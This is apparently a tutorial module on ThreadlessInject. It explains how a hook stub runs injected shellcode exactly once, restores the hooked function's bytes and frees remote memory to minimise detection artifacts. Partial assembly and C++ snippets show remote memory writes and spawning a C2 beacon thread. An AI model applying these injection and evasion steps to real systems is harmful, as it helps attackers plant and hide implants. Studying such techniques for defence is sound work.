Difficulty: Advanced

Module 7: Shellcode Execution & Cleanup

One-shot execution: run the payload once, then restore the hook and vanish.

The One-Shot Problem

ThreadlessInject is designed as a one-shot injection mechanism. The hook should fire once, execute the shellcode payload, and then clean itself up so the hooked function returns to normal. If the hook stays active, the shellcode runs on every call to the function, which causes three problems: initialization shellcode (such as a Cobalt Strike stager) that runs repeatedly can crash or misbehave, every call pays added latency, and the persistent hook is a detection artifact.

Why One-Shot Matters

Most shellcode payloads (stagers, loaders, implant bootstraps) are designed to run exactly once. They perform initialization, spawn their own thread for the C2 communication loop, and return. If the hook stub calls the shellcode every time the hooked function is called, you get multiple initializations, multiple C2 connections, and likely crashes from double-initialization of global state.

Scenario                  | Persistent Hook                | One-Shot Hook
Shellcode execution count | Every call to hooked function  | Exactly once
C2 connections            | Multiple (one per trigger)     | Single
Process stability         | Degrades over time             | Returns to normal
Detection window          | Permanent hook artifact        | Brief, then clean
Performance impact        | Continuous overhead            | One-time delay

The Execution Guard: Preventing Re-Execution

There are several approaches to ensuring one-shot execution. The actual ThreadlessInject tool uses self-restoration: the loader stub writes the original function bytes back over the hook before calling the shellcode, so the hook is removed on first trigger and subsequent calls go straight to the original function. The injector process then polls the hooked function's bytes (via NtReadVirtualMemory) for up to 60 seconds to detect when the original bytes have been restored, confirming execution occurred.

An alternative approach (shown below for educational purposes) uses an execution guard flag stored in the allocated memory region. The hook stub checks this flag before calling the shellcode. On the first execution, the flag is clear, so the shellcode runs. The stub then sets the flag, and all subsequent invocations skip the shellcode call.

x86-64 ASM
; Modified hook stub with execution guard
hook_stub:
    ; Check the execution guard (a DWORD at a known offset in our memory region)
    ; The guard is initialized to 0 by the injector
    lea rax, [rip + guard_offset]   ; Load address of guard variable
    lock cmpxchg [rax], ecx         ; Atomically check and set
    ; Alternative simpler approach:
    mov eax, [rip + guard_offset]   ; Read guard flag
    test eax, eax                   ; Is it zero?
    jnz skip_shellcode              ; If non-zero, skip shellcode (already executed)

    ; Set the guard to 1 (prevent future executions)
    mov dword ptr [rip + guard_offset], 1

    ; Save registers (same as Module 5)
    push rax
    push rcx
    ; ... (all registers saved)
    pushfq

    ; Align stack and call shellcode
    mov rbp, rsp
    and rsp, 0xFFFFFFF0
    sub rsp, 0x20
    mov rax, shellcode_addr
    call rax

    ; Restore registers
    mov rsp, rbp
    popfq
    ; ... (all registers restored)
    pop rax

skip_shellcode:
    ; Execute original bytes (always, regardless of guard)
    ; [14 bytes of saved original prologue]

    ; Jump back to hooked function + 14
    jmp [rip + 0]
    dq original_func_plus_14

guard_offset:
    dd 0    ; Initialized to 0, set to 1 after first execution

Atomic Guard with LOCK CMPXCHG

For true thread safety, the guard check should be atomic. Multiple threads might call the hooked function simultaneously, and we need to guarantee that only one thread executes the shellcode. The LOCK CMPXCHG instruction performs an atomic compare-and-swap: it checks if the guard is 0, and if so, sets it to 1 in a single atomic operation. Only the thread that successfully changes the guard from 0 to 1 proceeds to execute the shellcode; all other threads see the guard is already 1 and skip.
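The compare-and-swap semantics described above can be illustrated in ordinary, process-local C++ without any hooking. This is a minimal sketch of the general concurrency pattern, not code from ThreadlessInject: the names try_claim and count_winners are hypothetical, and std::atomic's compare_exchange_strong stands in for the hand-written instruction (on x86-64, mainstream compilers typically lower it to LOCK CMPXCHG).

```cpp
#include <atomic>
#include <cassert>
#include <thread>
#include <vector>

// Hypothetical helper names, for illustration only.
// Returns true for exactly one caller: the one that flips the guard from 0 to 1.
inline bool try_claim(std::atomic<int>& guard) {
    int expected = 0;
    // If guard == expected, store 1 and return true; otherwise copy the
    // current value into expected and return false. The whole step is atomic.
    return guard.compare_exchange_strong(expected, 1);
}

// Races thread_count threads against a single guard and reports how many won.
inline int count_winners(int thread_count) {
    assert(thread_count > 0);
    std::atomic<int> guard{0};
    std::atomic<int> winners{0};
    std::vector<std::thread> threads;
    threads.reserve(static_cast<std::size_t>(thread_count));
    for (int i = 0; i < thread_count; ++i) {
        threads.emplace_back([&guard, &winners] {
            if (try_claim(guard)) {
                winners.fetch_add(1);  // stands in for the one-time work
            }
        });
    }
    for (auto& t : threads) {
        t.join();
    }
    return winners.load();
}
```

Calling count_winners(8) races eight threads against one guard. Because the read, compare, and write happen as a single atomic step, exactly one thread can observe 0 and claim the guard. A separate read followed by a separate write gives no such guarantee.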

Self-Restoration: Unhooking After Execution

The most thorough cleanup approach is to restore the original function bytes after the shellcode executes. This removes the hook entirely, so the function returns to its original unmodified state. There are two ways to accomplish this:

Approach 1: Shellcode Restores the Hook

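The shellcode itself can restore the original bytes. In this variant, the shellcode is given the necessary information (original function address, original bytes, byte count) and uses NtProtectVirtualMemory and memcpy to restore the prologue. Note that this differs from the stub-side restoration described earlier, where the loader stub restores the bytes before the shellcode is called: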

C++
// Shellcode-side restoration (running inside the target process)
// The shellcode has been given pointers to the original bytes and target address

void ShellcodeEntry(RESTORATION_INFO* info) {
    // Step 1: Do the actual payload work (e.g., spawn beacon)
    LoadAndExecutePayload();

    // Step 2: Restore the hooked function's original bytes
    ULONG oldProtect = 0;
    PVOID addr = info->hookedFuncAddr;
    SIZE_T size = 14;

    // Make the code page writable again
    NtProtectVirtualMemory(
        GetCurrentProcess(), &addr, &size,
        PAGE_EXECUTE_READWRITE, &oldProtect
    );

    // Copy original bytes back over the hook JMP
    memcpy(info->hookedFuncAddr, info->originalBytes, 14);

    // Restore original protection
    NtProtectVirtualMemory(
        GetCurrentProcess(), &addr, &size,
        oldProtect, &oldProtect
    );
}

Approach 2: Injector Monitors and Restores

Alternatively, the injector process can monitor for a signal that the shellcode has executed (e.g., by checking the guard flag in remote memory via NtReadVirtualMemory), then restore the original bytes from the injector side:

C++
// Injector-side restoration (running in the attacker's process)
// Poll the guard flag until shellcode has executed

printf("[*] Waiting for shellcode execution...\n");

DWORD guard = 0;
while (guard == 0) {
    NtReadVirtualMemory(hProcess, guardFlagAddr, &guard, sizeof(guard), NULL);
    Sleep(100);  // Check every 100ms
}

printf("[+] Shellcode executed! Restoring original bytes...\n");

// Restore the original function prologue
PVOID protAddr = (PVOID)hookedFuncAddr;
SIZE_T protSize = 14;
ULONG oldProt = 0;

NtProtectVirtualMemory(hProcess, &protAddr, &protSize,
    PAGE_EXECUTE_READWRITE, &oldProt);

NtWriteVirtualMemory(hProcess, (PVOID)hookedFuncAddr,
    originalBytes, 14, NULL);

NtProtectVirtualMemory(hProcess, &protAddr, &protSize,
    oldProt, &oldProt);

printf("[+] Hook removed, original function restored.\n");

One-Shot Execution Timeline

T0: Hook installed, guard = 0, waiting for trigger
T1: Thread A calls hooked function, guard is 0 → shellcode executes
T2: Guard set to 1, shellcode spawns implant thread
T3: Thread B calls hooked function, guard is 1 → shellcode skipped
T4: Original bytes restored, hook removed entirely
T5: Function back to normal, no artifacts remain in prologue

Memory Cleanup

After the hook is removed and the original function is restored, the allocated memory region (containing the hook stub and shellcode) remains in the target process. For a simple stager that spawns its own long-running thread, this is acceptable — the stager code is no longer needed, but freeing it while the spawned thread might still reference it could cause issues.

For a thorough cleanup, you can optionally free the memory:

C++
// Optional: Free the hook stub + shellcode memory
// Only safe if shellcode has fully bootstrapped and no longer needs the region
PVOID freeAddr = remoteBase;
SIZE_T freeSize = 0;  // 0 means release the entire region

NtFreeVirtualMemory(
    hProcess,
    &freeAddr,
    &freeSize,
    MEM_RELEASE
);
// The remote memory region is now freed
// Warning: only do this if the shellcode has completed bootstrapping

Cleanup Trade-offs

Freeing the remote memory is ideal for stealth but risky for stability. If the shellcode allocated any structures that point back into the hook region, or if it spawned a thread that occasionally references that region, freeing the memory causes a use-after-free crash. In practice, many operators leave the memory allocated (it is small, typically a few kilobytes) and accept the minor forensic artifact. Executable (RX) private memory with no backing image file is itself a detection vector, but it is less conspicuous than an active hook on a function prologue.

Handling Shellcode That Blocks

Some shellcode payloads block (run for a long time or indefinitely) rather than quickly spawning a thread and returning. If your shellcode blocks, the thread that triggered the hook is stuck in the shellcode and never returns to the hooked function. Whatever that thread was doing (processing messages, handling connections, and so on) stops, which can break the target application.

For this reason, well-designed shellcode for threadless injection should follow the pattern: spawn a new thread (or work item) for the long-running C2 loop, then return control to the hook stub immediately. This way, the hijacked thread resumes its normal operation within milliseconds.

C++
// Good shellcode pattern for threadless injection:
// Spawn a worker thread for the long-running payload, then return quickly

void ShellcodeEntry() {
    // Quickly bootstrap: resolve CreateThread, allocate implant memory, etc.
    pCreateThread CreateThread = ResolveAPI("kernel32.dll", "CreateThread");

    // Spawn the long-running C2 loop on a new thread
    CreateThread(NULL, 0, BeaconMainLoop, NULL, 0, NULL);

    // Return immediately so the hook stub can restore registers
    // and resume the hooked function
    return;
}
// Total time on the hijacked thread: ~1ms for the bootstrap

The Clean State After Execution

When the one-shot pattern works correctly, the end state is remarkably clean: the shellcode has spawned its implant on a new thread (which looks like any other thread to the OS), the hooked function has been restored to its original bytes, and the only remaining artifact is the allocated memory region containing the now-inactive hook stub. Compare this to traditional injection where a thread exists whose start address points to VirtualAllocEx'd memory — ThreadlessInject's forensic footprint is substantially smaller.

Pop Quiz: Execution & Cleanup

Q1: Why is one-shot execution important for ThreadlessInject?

Shellcode payloads like Cobalt Strike stagers perform one-time initialization: resolving API addresses, establishing C2 connections, allocating global structures. Running this initialization multiple times causes duplicate connections, double-free bugs, or corruption of global state. The one-shot pattern ensures the shellcode runs exactly once.

Q2: How does LOCK CMPXCHG help with the execution guard?

LOCK CMPXCHG performs an atomic compare-and-swap. It reads the guard, compares it to 0, and if they match, writes 1 — all in a single atomic operation. If two threads hit the hook simultaneously, only one will see the guard as 0 and set it to 1; the other will see 1 and skip the shellcode.

Q3: Why should shellcode for threadless injection spawn a new thread and return quickly?

The hook runs on an existing thread that was about to call the hooked function. If the shellcode blocks (e.g., enters a C2 loop), that thread never returns from the function call. This means whatever the thread was doing (processing messages, handling connections, etc.) stops, which can break the target application. By spawning a new thread for the long-running work and returning immediately, the existing thread resumes its normal duties.